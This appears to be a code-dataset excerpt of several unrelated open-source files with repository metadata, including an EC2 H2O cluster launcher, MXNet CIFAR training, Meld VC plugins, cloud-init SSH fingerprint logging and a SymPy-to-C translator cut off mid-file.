elif demisto.command() == "email":
return_outputs(*email_command(client, demisto.args()))
else:
return_error('Command not found.')
# Log exceptions
except Exception as e:
return_error(f"Failed to execute {demisto.command()} command. Error: {str(e)}")
if __name__ in ("__main__", "__builtin__", "builtins"):
main()
|
mit
| -7,711,274,168,360,616,000
| 35.69375
| 120
| 0.590785
| false
| 3.974949
| true
| false
| false
|
kumkee/SURF2016
|
src/marketdata/globalpricematrix.py
|
1
|
3459
|
from coinlist import CoinList
import pandas as pd
from time import time
from time import sleep
import numpy as np
NOW = 0
FIVE_MINUTES = 60*5
FIFTEEN_MINUTES = FIVE_MINUTES * 3
HALF_HOUR = FIFTEEN_MINUTES * 2
HOUR = HALF_HOUR * 2
TWO_HOUR = HOUR * 2
FOUR_HOUR = HOUR * 4
DAY = HOUR * 24
YEAR = DAY * 365
CSV_DEFAULT = 'pm.csv'
COIN_REF = 'LTC'
class GlobalPriceMatrix(CoinList):
def __init__(self, start = DAY, end = NOW, period = HALF_HOUR, csv = None, coin_filter = 0.2):
if not csv:
super(GlobalPriceMatrix, self).__init__()
self._coin_filter = coin_filter
if csv:
self.__getPriceFromFile(csv)
else:
self.__getPriceFromExchange(start, end, period)
def __getPriceFromExchange(self, start, end, period):
t = time()
self._start = t - start
self._end = t - end + 10*period
self._period = period
self.__coinFilter()
self.__checkperiod()
coin = COIN_REF
chart = self.getChart(coin, start = self._start, end = self._end)
cols = [d['date'] for d in chart]
self._pm = pd.DataFrame(index = self._coins, columns = cols).astype('float32')
self.__fillPriceRow(coin, start = self._start, end = self._end)
for c in self._coins:
if c == COIN_REF:
continue
self.__fillPriceRow(c, start = self._start, end = self._end)
def __fillPriceRow(self, coin, start, end):
chart = self.getChart(coin=coin, start=start, end=end)
for c in chart:
self._pm.at[coin, c['date']] = c['close']
@property
def pricedata(self):
return self._pm
@property
def pricematrix(self):
return self._pm.as_matrix()
def getChart(self, coin, start, end):
chart = self.polo.marketChart( \
pair = self.allActiveCoins.at[coin, 'pair'], \
start = start, \
end = end, \
period = self._period )
return chart
def __coinFilter(self):
if(self._coin_filter):
self._coins = self.topNVolume(
n = int(len(self.allActiveCoins) * self._coin_filter)).index
def to_csv(self, filepath = CSV_DEFAULT):
#Save the database into csv file
pm = self._pm.transpose()
pm.index = pd.to_datetime(pm.index, unit = 's')
pm.to_csv(filepath)
def __getPriceFromFile(self, csv = CSV_DEFAULT):
pm = pd.DataFrame.from_csv(csv).astype('float32')
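        # The datetime index as int64 is in nanoseconds; divide by 10**9 to get Unix seconds.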
pm.index = pm.index.astype(np.int64)/10**9
self._pm = pm.transpose()
self._start = self._pm.columns[0]
self._end = self._pm.columns[-1]
self._period = self._pm.columns[1] - self._start
def __checkperiod(self):
if self._period == FIVE_MINUTES:
return
elif self._period == FIFTEEN_MINUTES:
return
elif self._period == HALF_HOUR:
return
elif self._period == TWO_HOUR:
return
elif self._period == FOUR_HOUR:
return
elif self._period == DAY:
return
else:
            raise ValueError('period has to be 5min, 15min, 30min, 2hr, 4hr, or a day')
FIVE_MINUTES = 60*5
FIFTEEN_MINUTES = FIVE_MINUTES * 3
HALF_HOUR = FIFTEEN_MINUTES * 2
#HOUR = HALF_HOUR * 2
TWO_HOUR = HALF_HOUR * 4
FOUR_HOUR = HALF_HOUR * 8
DAY = HALF_HOUR * 48
|
gpl-3.0
| 28,672,610,416,348,292
| 27.121951
| 98
| 0.558832
| false
| 3.387855
| false
| false
| false
|
jangorecki/h2o-3
|
ec2/h2o-cluster-launch-instances.py
|
1
|
4600
|
#!/usr/bin/env python
import os
import sys
import time
import boto
import boto.ec2
# Environment variables you MUST set (either here or by passing them in).
# -----------------------------------------------------------------------
#
os.environ['AWS_ACCESS_KEY_ID'] = ''
os.environ['AWS_SECRET_ACCESS_KEY'] = ''
os.environ['AWS_SSH_PRIVATE_KEY_FILE'] = ''
# Launch EC2 instances with an IAM role
# --------------------------------------
#
iam_profile_resource_name = None
# or
iam_profile_name = None
# Options you MUST tailor to your own AWS account.
# ------------------------------------------------
# SSH key pair name.
keyName = ''
# AWS security group name.
# Note:
# H2O uses TCP and UDP ports 54321 and 54322.
# RStudio uses TCP port 8787.
securityGroupName = 'SecurityDisabled'
# Options you might want to change.
# ---------------------------------
numInstancesToLaunch = 2
instanceType = 'm3.2xlarge'
instanceNameRoot = 'h2o-instance'
# Options to help debugging.
# --------------------------
debug = 0
# debug = 1
dryRun = False
# dryRun = True
# Options you should not change unless you really mean to.
# --------------------------------------------------------
regionName = 'us-east-1'
amiId = 'ami-0b100e61'
#regionName = 'us-west-1'
#amiID = 'ami-c1afd6a1'
#--------------------------------------------------------------------------
# No need to change anything below here.
#--------------------------------------------------------------------------
# Note: this python script was initially developed with boto 2.13.3.
def botoVersionMismatch():
print 'WARNING: Unsupported boto version. Please upgrade boto to at least 2.13.x and try again.'
print 'Comment this out to run anyway.'
print 'Exiting.'
sys.exit(1)
if not 'AWS_ACCESS_KEY_ID' in os.environ:
print 'ERROR: You must set AWS_ACCESS_KEY_ID in the environment.'
sys.exit(1)
if not 'AWS_SECRET_ACCESS_KEY' in os.environ:
print 'ERROR: You must set AWS_SECRET_ACCESS_KEY in the environment.'
sys.exit(1)
if not 'AWS_SSH_PRIVATE_KEY_FILE' in os.environ:
print 'ERROR: You must set AWS_SSH_PRIVATE_KEY_FILE in the environment.'
sys.exit(1)
publicFileName = 'nodes-public'
privateFileName = 'nodes-private'
if not dryRun:
fpublic = open(publicFileName, 'w')
fprivate = open(privateFileName, 'w')
print 'Using boto version', boto.Version
if True:
botoVersionArr = boto.Version.split(".")
    if (int(botoVersionArr[0]) != 2):
        botoVersionMismatch()
    if (int(botoVersionArr[1]) < 13):
        botoVersionMismatch()
if (debug):
boto.set_stream_logger('h2o-ec2')
ec2 = boto.ec2.connect_to_region(regionName, debug=debug)
print 'Launching', numInstancesToLaunch, 'instances.'
reservation = ec2.run_instances(
image_id=amiId,
min_count=numInstancesToLaunch,
max_count=numInstancesToLaunch,
key_name=keyName,
instance_type=instanceType,
security_groups=[securityGroupName],
instance_profile_arn=iam_profile_resource_name,
instance_profile_name=iam_profile_name,
dry_run=dryRun
)
for i in range(numInstancesToLaunch):
instance = reservation.instances[i]
print 'Waiting for instance', i+1, 'of', numInstancesToLaunch, '...'
instance.update()
while instance.state != 'running':
print ' .'
time.sleep(1)
instance.update()
print ' instance', i+1, 'of', numInstancesToLaunch, 'is up.'
name = instanceNameRoot + str(i)
instance.add_tag('Name', value=name)
print
print 'Creating output files: ', publicFileName, privateFileName
print
for i in range(numInstancesToLaunch):
instance = reservation.instances[i]
instanceName = ''
if 'Name' in instance.tags:
instanceName = instance.tags['Name'];
print 'Instance', i+1, 'of', numInstancesToLaunch
print ' Name: ', instanceName
print ' PUBLIC: ', instance.public_dns_name
print ' PRIVATE:', instance.private_ip_address
print
fpublic.write(instance.public_dns_name + '\n')
fprivate.write(instance.private_ip_address + '\n')
fpublic.close()
fprivate.close()
print 'Sleeping for 60 seconds for ssh to be available...'
time.sleep(60)
d = os.path.dirname(os.path.realpath(__file__))
print 'Testing ssh access...'
cmd = d + '/' + 'h2o-cluster-test-ssh.sh'
rv = os.system(cmd)
if rv != 0:
print 'Failed.'
sys.exit(1)
print
print 'Distributing flatfile...'
cmd = d + '/' + 'h2o-cluster-distribute-flatfile.sh'
rv = os.system(cmd)
if rv != 0:
print 'Failed.'
sys.exit(1)
# Distribute flatfile script already prints success when it completes.
|
apache-2.0
| 4,029,750,662,069,026,000
| 25.900585
| 102
| 0.622391
| false
| 3.490137
| false
| false
| false
|
oksome/Tumulus
|
tumulus/tag.py
|
1
|
1267
|
# -*- coding: utf-8 -*-
# This file is part of Tumulus.
#
# Copyright (C) 2013 OKso (http://okso.me)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
See reference: http://www.javascriptkit.com/domref/elementproperties.shtml
'''
from .element import Element, EmptyElement
class Tag(object):
def __init__(self, tagname, element=Element):
self.tagname = tagname
self.element = element
def __call__(self, *inner, **kwargs):
return self.element(self.tagname, components=inner, attributes=kwargs)
class EmptyTag(Tag):
def __call__(self, *inner, **kwargs):
return EmptyElement(self.tagname, attributes=kwargs)
|
agpl-3.0
| 2,938,885,543,379,877,000
| 30.675
| 78
| 0.713496
| false
| 3.886503
| false
| false
| false
|
Calvinxc1/Data_Analytics
|
blog/2017-01-08/oldschool_linear.py
|
1
|
2522
|
#%% libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#%% gradient descent linear regression function
def grad_descent(dataset, features, predictor, learn_rate, max_iters = 10000):
def initialize_model(dataset, features, predictor):
constant_array = np.ones(shape = (len(dataset), 1))
features_array = dataset.loc[:, features].values
features_array = np.append(constant_array, features_array, axis = 1)
predict_array = dataset.loc[:, predictor].values
betas = np.zeros(shape = (len(features) + 1, len(predictor)))
return (features_array, predict_array, betas)
def calc_gradient(features_array, predict_array, betas):
prediction = np.dot(features_array, betas)
predict_error = predict_array - prediction
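        # Gradient of the squared-error loss with respect to the betas: -2 * X^T (y - X*beta).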
gradient = -2 * np.dot(features_array.transpose(), predict_error)
return gradient
def update_betas(gradient, betas, learn_rate):
new_betas = betas - (gradient * learn_rate)
return new_betas
def model_error(features_array, predict_array, betas):
prediction = np.dot(features_array, betas)
predict_error = predict_array - prediction
model_error = np.sqrt(np.mean(predict_error ** 2))
return model_error
features_array, predict_array, betas = initialize_model(dataset, features, predictor)
prior_error = np.inf
for iter_count in range(max_iters):
gradient = calc_gradient(features_array, predict_array, betas)
betas = update_betas(gradient, betas, learn_rate)
curr_error = model_error(features_array, predict_array, betas)
if curr_error == prior_error:
break
prior_error = curr_error
return (betas, iter_count, curr_error)
#%% model test collection
house_data = pd.read_csv('kc_house_data.csv')
features = ['sqft_living', 'bedrooms', 'bathrooms']
predictor = ['price']
low_learn = 11.041
high_learn = 11.05
learn_splits = 2500
learn_rates = [10 ** -(i / learn_splits) for i in range(int(low_learn * learn_splits), int(high_learn * learn_splits))]
model_errors = []
iter_counts = []
beta_record = []
for learn_rate in learn_rates:
(betas, iter_count, curr_error) = grad_descent(house_data, features, predictor, learn_rate, max_iters = int(10e3))
model_errors.append(curr_error)
iter_counts.append(iter_count)
beta_record.append(betas)
#%%
plt.plot(np.log(model_errors[0:18]))
#%%
plt.plot(model_errors[17:32])
#%%
plt.plot(iter_counts)
|
gpl-3.0
| 6,453,053,014,177,452,000
| 39.047619
| 119
| 0.666138
| false
| 3.459534
| false
| false
| false
|
jfterpstra/bluebottle
|
bluebottle/recurring_donations/tests/test_api.py
|
1
|
5153
|
from django.core.urlresolvers import reverse
from rest_framework import status
from bluebottle.bb_projects.models import ProjectPhase
from bluebottle.geo.models import Country
from bluebottle.test.factory_models.accounts import BlueBottleUserFactory
from bluebottle.test.factory_models.geo import CountryFactory
from bluebottle.test.factory_models.projects import ProjectFactory
from bluebottle.test.utils import BluebottleTestCase
class MonthlyDonationApiTest(BluebottleTestCase):
def setUp(self):
super(MonthlyDonationApiTest, self).setUp()
self.init_projects()
self.phase_campaign = ProjectPhase.objects.get(slug='campaign')
self.country = CountryFactory()
self.some_project = ProjectFactory.create(amount_asked=500,
status=self.phase_campaign)
self.another_project = ProjectFactory.create(amount_asked=750,
status=self.phase_campaign)
self.some_user = BlueBottleUserFactory.create()
self.some_user_token = "JWT {0}".format(self.some_user.get_jwt_token())
self.another_user = BlueBottleUserFactory.create()
self.another_user_token = "JWT {0}".format(
self.another_user.get_jwt_token())
self.monthly_donation_url = reverse('monthly-donation-list')
self.monthly_donation_project_url = reverse('monthly-donation-project-list')
self.monthly_profile = {'iban': 'NL13TEST0123456789',
'bic': 'TESTNL2A',
'name': 'Nijntje het Konijntje',
'city': 'Amsterdam',
'country': self.country.id,
'amount': u'50.00'}
def test_create_monthly_donation(self):
"""
Tests for creating, retrieving, updating monthly donation.
"""
# Check that user has no monthly donation
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 0)
self.assertEqual(response.data['results'], [])
# Create a new monthly donation
response = self.client.post(self.monthly_donation_url,
self.monthly_profile,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED,
response.data)
self.assertEqual(response.data['amount'],
self.monthly_profile['amount'])
self.assertEqual(response.data['active'], True)
some_monthly_donation_id = response.data['id']
# Reload it and check that all is still well.
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 1)
self.assertEqual(response.data['results'][0]['amount'],
self.monthly_profile['amount'])
# Add a preferred projects
monthly_project = {
'donation': some_monthly_donation_id,
'project': self.some_project.slug
}
response = self.client.post(self.monthly_donation_project_url,
monthly_project,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED,
response.data)
# Reload it. It should have that project embedded
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(len(response.data['results'][0]['projects']), 1)
self.assertEqual(response.data['results'][0]['projects'][0]['project'],
self.some_project.slug)
# Another user should not have a monthly donation
response = self.client.get(self.monthly_donation_url,
token=self.another_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 0)
# Another user can't add a project to first monthly donation
monthly_project = {
'donation': some_monthly_donation_id,
'project': self.another_project.slug
}
response = self.client.post(self.monthly_donation_project_url,
monthly_project,
token=self.another_user_token)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN,
response.data)
|
bsd-3-clause
| -2,161,579,183,659,187,500
| 45.423423
| 84
| 0.579856
| false
| 4.423176
| true
| false
| false
|
z01nl1o02/tests
|
mxnet/cifar/cifar10/demo.py
|
1
|
2581
|
import mxnet as mx
from mxnet.gluon import nn
from mxnet import gluon
import sys
import utils
import pdb,os,sys
from importlib import import_module
import logging
import numpy as np
trainBatchSize = 100
testBatchSize = 50
dataShape = (3,32,32)
classNum = 10
pretrained = None
checkpoints = 'checkpoints/'
inputroot = "c:/dataset/cifar/split/"
lr_base = 0.01
weight_decay = 0.0005
mean = np.zeros(dataShape)
mean[0,:,:] = 0.4914
mean[1,:,:] = 0.4822
mean[2,:,:] = 0.4465
std = np.zeros(dataShape)
std[0,:,:] = 0.2023
std[1,:,:] = 0.1994
std[2,:,:] = 0.2010
def test_transform(X,Y):
out = X.astype(np.float32)/255.0
out = np.transpose(out,(2,0,1))
#pdb.set_trace()
#return (mx.image.color_normalize(out,np.asarray([0.4914, 0.4822, 0.4465]), np.asarray([0.2023, 0.1994, 0.2010])),Y)
return (mx.image.color_normalize(out.asnumpy(),mean,std),Y)
def train_transform(X,Y):
return test_transform(X,Y)
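# Quick worked check of the per-channel normalization above (illustrative only):
# a red-channel pixel of 128/255 ~= 0.502 maps to (0.502 - 0.4914) / 0.2023 ~= 0.052
# after color_normalize, i.e. roughly zero-centered with unit-ish spread.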
def get_net():
mod = import_module('symbol.resnet18')
net = mod.get_symbol(classNum,utils.try_gpu())
return net
def get_train_test(): #mxnet 1.0.0
train_ds = mx.gluon.data.vision.ImageFolderDataset( os.path.join(inputroot, 'train') , flag=1, transform = train_transform)
test_ds = mx.gluon.data.vision.ImageFolderDataset( os.path.join(inputroot, 'test'), flag=1, transform = test_transform)
for label,labelname in enumerate( train_ds.synsets ):
logging.info('%d %s'%(label, labelname))
loader = mx.gluon.data.DataLoader
train_data = loader( train_ds, \
trainBatchSize,shuffle=True, last_batch='keep')
test_data =loader( test_ds, \
testBatchSize, shuffle=True, last_batch='keep')
return (train_data, test_data)
def get_trainer(net):
loss = gluon.loss.SoftmaxCrossEntropyLoss()
trainer = gluon.Trainer(net.collect_params(),"sgd",{'learning_rate':lr_base, 'momentum':0.9, 'wd':weight_decay})
return (trainer,loss)
def main():
net = get_net()
net_str = '%s'%net
#logging.info('ok')
logging.info(net_str)
if pretrained is not None:
net.load_params(pretrained,ctx=utils.try_gpu())
train_data, test_data = get_train_test()
trainer,loss = get_trainer(net)
utils.train(train_data, test_data, trainBatchSize,\
net, loss, trainer, utils.try_gpu(), 1000,\
500,0.1,print_batches=100, chk_pts_dir=checkpoints)
if __name__=="__main__":
logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p',filename="train.log", level=logging.INFO)
main()
|
gpl-2.0
| -2,859,128,899,069,319,700
| 30.096386
| 130
| 0.649361
| false
| 2.956472
| true
| false
| false
|
kaiw/meld
|
meld/vc/__init__.py
|
1
|
3230
|
### Copyright (C) 2002-2005 Stephen Kennedy <stevek@gnome.org>
### Redistribution and use in source and binary forms, with or without
### modification, are permitted provided that the following conditions
### are met:
###
### 1. Redistributions of source code must retain the above copyright
### notice, this list of conditions and the following disclaimer.
### 2. Redistributions in binary form must reproduce the above copyright
### notice, this list of conditions and the following disclaimer in the
### documentation and/or other materials provided with the distribution.
### THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
### IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
### OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
### IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
### INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
### NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
### DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
### THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
### (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
### THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import glob
from . import _null
from ._vc import DATA_NAME, DATA_STATE, DATA_REVISION, DATA_OPTIONS
def load_plugins():
_vcdir = os.path.dirname(os.path.abspath(__file__))
ret = []
for plugin in glob.glob(os.path.join(_vcdir, "[a-z]*.py")):
modname = "meld.vc.%s" % os.path.basename(os.path.splitext(plugin)[0])
ret.append( __import__(modname, globals(), locals(), "*") )
return ret
_plugins = load_plugins()
def get_plugins_metadata():
ret = []
for p in _plugins:
# Some plugins have VC_DIR=None until instantiated
if p.Vc.VC_DIR:
ret.append(p.Vc.VC_DIR)
# Most plugins have VC_METADATA=None
if p.Vc.VC_METADATA:
ret.extend(p.Vc.VC_METADATA)
return ret
vc_sort_order = (
"Git",
"Bazaar",
"Mercurial",
"Fossil",
"Monotone",
"Darcs",
"SVK",
"Subversion",
"Subversion 1.7",
"CVS",
)
def get_vcs(location):
"""Pick only the Vcs with the longest repo root
Some VC plugins locate their repository root
by walking the filesystem upwards from the given
location, and now that we display multiple VCs in the
same directory, we must filter out those other
repositories found along the search path towards "/",
as they are not relevant to the user.
"""
vcs = []
max_len = 0
for plugin in _plugins:
try:
avc = plugin.Vc(location)
l = len(avc.root)
if l == max_len:
vcs.append(avc)
elif l > max_len:
max_len = l
vcs = [avc]
except ValueError:
pass
if not vcs:
# No plugin recognized that location, fallback to _null
return [_null.Vc(location)]
vc_sort_key = lambda v: vc_sort_order.index(v.NAME)
vcs.sort(key=vc_sort_key)
return vcs
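# Hypothetical usage sketch (the path below is illustrative): resolve the
# active plugins for a working copy and list their names in vc_sort_order.
# >>> active = get_vcs("/path/to/working/copy")
# >>> [vc.NAME for vc in active]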
|
gpl-2.0
| 4,926,562,048,158,405,000
| 32.645833
| 78
| 0.64644
| false
| 3.919903
| false
| false
| false
|
cbuben/cloud-init
|
cloudinit/config/cc_ssh_authkey_fingerprints.py
|
1
|
3690
|
# vi: ts=4 expandtab
#
# Copyright (C) 2012 Yahoo! Inc.
#
# Author: Joshua Harlow <harlowja@yahoo-inc.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import base64
import hashlib
from prettytable import PrettyTable
# Ensure this is aliased to a name not 'distros'
# since the module attribute 'distros'
# is a list of distros that are supported, not a sub-module
from cloudinit import distros as ds
from cloudinit import ssh_util
from cloudinit import util
def _split_hash(bin_hash):
split_up = []
for i in xrange(0, len(bin_hash), 2):
split_up.append(bin_hash[i:i + 2])
return split_up
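# For example (illustrative):
# >>> _split_hash("d41d8cd9")
# ['d4', '1d', '8c', 'd9']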
def _gen_fingerprint(b64_text, hash_meth='md5'):
if not b64_text:
return ''
# TBD(harlowja): Maybe we should feed this into 'ssh -lf'?
try:
hasher = hashlib.new(hash_meth)
hasher.update(base64.b64decode(b64_text))
return ":".join(_split_hash(hasher.hexdigest()))
except (TypeError, ValueError):
# Raised when b64 not really b64...
# or when the hash type is not really
# a known/supported hash type...
return '?'
def _is_printable_key(entry):
if any([entry.keytype, entry.base64, entry.comment, entry.options]):
if (entry.keytype and
entry.keytype.lower().strip() in ['ssh-dss', 'ssh-rsa']):
return True
return False
def _pprint_key_entries(user, key_fn, key_entries, hash_meth='md5',
prefix='ci-info: '):
if not key_entries:
message = ("%sno authorized ssh keys fingerprints found for user %s.\n"
% (prefix, user))
util.multi_log(message)
return
tbl_fields = ['Keytype', 'Fingerprint (%s)' % (hash_meth), 'Options',
'Comment']
tbl = PrettyTable(tbl_fields)
for entry in key_entries:
if _is_printable_key(entry):
row = []
row.append(entry.keytype or '-')
row.append(_gen_fingerprint(entry.base64, hash_meth) or '-')
row.append(entry.options or '-')
row.append(entry.comment or '-')
tbl.add_row(row)
authtbl_s = tbl.get_string()
authtbl_lines = authtbl_s.splitlines()
max_len = len(max(authtbl_lines, key=len))
lines = [
util.center("Authorized keys from %s for user %s" %
(key_fn, user), "+", max_len),
]
lines.extend(authtbl_lines)
for line in lines:
util.multi_log(text="%s%s\n" % (prefix, line),
stderr=False, console=True)
def handle(name, cfg, cloud, log, _args):
if util.is_true(cfg.get('no_ssh_fingerprints', False)):
log.debug(("Skipping module named %s, "
"logging of ssh fingerprints disabled"), name)
return
hash_meth = util.get_cfg_option_str(cfg, "authkey_hash", "md5")
(users, _groups) = ds.normalize_users_groups(cfg, cloud.distro)
for (user_name, _cfg) in users.items():
(key_fn, key_entries) = ssh_util.extract_authorized_keys(user_name)
_pprint_key_entries(user_name, key_fn,
key_entries, hash_meth)
|
gpl-3.0
| 5,022,524,162,396,625,000
| 34.142857
| 79
| 0.615989
| false
| 3.565217
| false
| false
| false
|
vincent-noel/libSigNetSim
|
libsignetsim/cwriter/CMathWriter.py
|
1
|
12709
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2017 Vincent Noel (vincent.noel@butantan.gov.br)
#
# This file is part of libSigNetSim.
#
# libSigNetSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# libSigNetSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libSigNetSim. If not, see <http://www.gnu.org/licenses/>.
"""
This file defines CMathWriter, which translates sympy expression trees into C code strings.
"""
from __future__ import print_function
from sympy import simplify, srepr
from libsignetsim.model.math.sympy_shortcuts import *
from libsignetsim.settings.Settings import Settings
from libsignetsim.model.math.MathException import MathException, DelayNotImplemented
class CMathWriter(object):
""" Class for handling math formulaes """
MATH_ERR = -1
MATH_SBML = 0
MATH_INTERNAL = 1
MATH_DEVINTERNAL = 2
MATH_C = 3
MATH_PRETTYPRINT = 4
MATH_FORMULA = 20
MATH_EQUATION = 21
MATH_VARIABLE = 22
MATH_KINETICLAW = 23
MATH_FUNCTION = 24
MATH_RATERULE = 25
MATH_EVENTASSIGNMENT= 26
MATH_ASSIGNMENTRULE = 27
MATH_ALGEBRAICRULE = 28
ZERO = SympyInteger(0)
def __init__(self, model):
""" Constructor """
self.model = model
def writeCCode(self, tree):
math = self.translateForC(tree)
if Settings.verbose >= 2:
print("\n> writeCCode")
print(">> input : %s" % srepr(tree))
print(">> input simplified : %s" % str(tree))
print(">> output : %s" % math)
return math
def translateVariableForC(self, variable, derivative=False):
""" Translates a Sympy symbol in C """
if str(variable) == "_time_":
return "t"
elif str(variable) == "_avogadro_":
return "RT_NA"
t_var = None
if self.model.listOfVariables.containsSymbol(variable):
t_var = self.model.listOfVariables.getBySymbol(variable)
else:
print("> Err : %s" % str(variable))
t_pos = None
if t_var.isDerivative():
if derivative:
c_var = "ydot"
else:
c_var = "y"
t_pos = t_var.ind+1
elif t_var.isAssignment():
c_var = "ass"
t_pos = t_var.ind+1
elif t_var.isConstant():
c_var = "cst"
t_pos = t_var.ind+1
elif t_var.isAlgebraic():
if derivative:
c_var = "ydot"
else:
c_var = "y"
t_pos = self.model.nbOdes + t_var.ind+1
else:
raise MathException("Cannot determine the mathematical type of variable %s" % str(variable))
return "Ith(%s,%s)" % (c_var, t_pos)
def translateForC(self, tree):
""" Translate a sympy tree into a C string """
if isinstance(tree, int):
return "RCONST(%d.0)" % tree
elif isinstance(tree, float):
t_string = "%.16g" % tree
if "." not in t_string and "e" not in t_string:
t_string += ".0"
return "RCONST(%s)" % t_string
elif tree.func == SympySymbol:
return self.translateVariableForC(tree)
elif tree.func == SympyDerivative:
return self.translateVariableForC(tree.args[0], derivative=True)
elif tree.func == SympyInteger:
return "RCONST(%d.0)" % int(tree)
elif tree.func == SympyFloat:
t_string = "%.16g" % float(tree)
if "." not in t_string and "e" not in t_string:
t_string += ".0"
return "RCONST(%s)" % t_string
elif tree.func == SympyRational:
return "(%s/%s)" % (self.translateForC(tree.p), self.translateForC(tree.q))
elif tree.func == SympyNegOne:
return "RCONST(-1.0)"
elif tree.func == SympyOne:
return "RCONST(1.0)"
elif tree.func == SympyHalf:
return "RCONST(0.5)"
elif tree.func == SympyZero:
return "RCONST(0.0)"
elif tree == SympyPi:
return "RT_PI"
elif tree.func == SympyE or tree.func == SympyExp1:
return "RT_E"
elif tree == SympyInf:
return "RT_INF"
elif tree == -SympyInf:
return "-RT_INF"
elif tree == SympyNan:
return "RT_NAN"
elif tree == SympyTrue or tree == True:
return "1"
elif tree == SympyFalse or tree == False:
return "0"
elif tree.func == SympyMax:
return "max(%s, %s)" % (
self.translateForC(tree.args[0]),
self.translateForC(tree.args[1])
)
elif tree.func == SympyAdd:
t_add = "("
for i_arg, arg in enumerate(tree.args):
if i_arg > 0:
t_add = t_add + " + "
t_add = t_add + self.translateForC(arg)
return t_add + ")"
elif tree.func == SympyMul:
if len(tree.args) == 2:
if tree.args[0].func == SympyNegOne:
return "-" + self.translateForC(tree.args[1])
if tree.args[1].func == SympyNegOne:
return "-" + self.translateForC(tree.args[0])
started = False
t_minus = ""
t_mul = ""
t_divider = ""
for i_arg, arg in enumerate(tree.args):
if arg.func == SympyNegOne:
t_mul = "-" + t_mul
elif arg.func == SympyPow and arg.args[1].func == SympyNegOne:
if t_divider == "":
t_divider = "%s" % self.translateForC(arg.args[0])
else:
t_divider += "*%s" % self.translateForC(arg.args[0])
else:
if started:
t_mul += "*"
started = True
t_mul += self.translateForC(arg)
if t_divider == "":
return t_mul
else:
return t_minus + "(" + t_mul + "/(%s))" % t_divider
# AST_FUNCTION_ABS
elif tree.func == SympyAbs:
return "rt_abs(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_QUOTIENT
elif tree.func == SympyQuotient:
return "((int) rt_floor(%s/%s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_REM
elif tree.func == SympyRem:
return "((int) fmod(%s, %s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_ARCCOS
elif tree.func == SympyAcos:
return "rt_acos(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOSH
elif tree.func == SympyAcosh:
return "rt_acosh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOT
elif tree.func == SympyAcot:
return "rt_acot(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCSC
elif tree.func == SympyAcsc:
return "rt_acsc(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCCOTH
elif tree.func == SympyAcoth:
return "rt_acoth(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSIN
elif tree.func == SympyAsec:
return "rt_asec(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSIN
elif tree.func == SympyAsin:
return "rt_asin(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCSINH
elif tree.func == SympyAsinh:
return "rt_asinh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCTAN
elif tree.func == SympyAtan:
return "rt_atan(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_ARCTANH
elif tree.func == SympyAtanh:
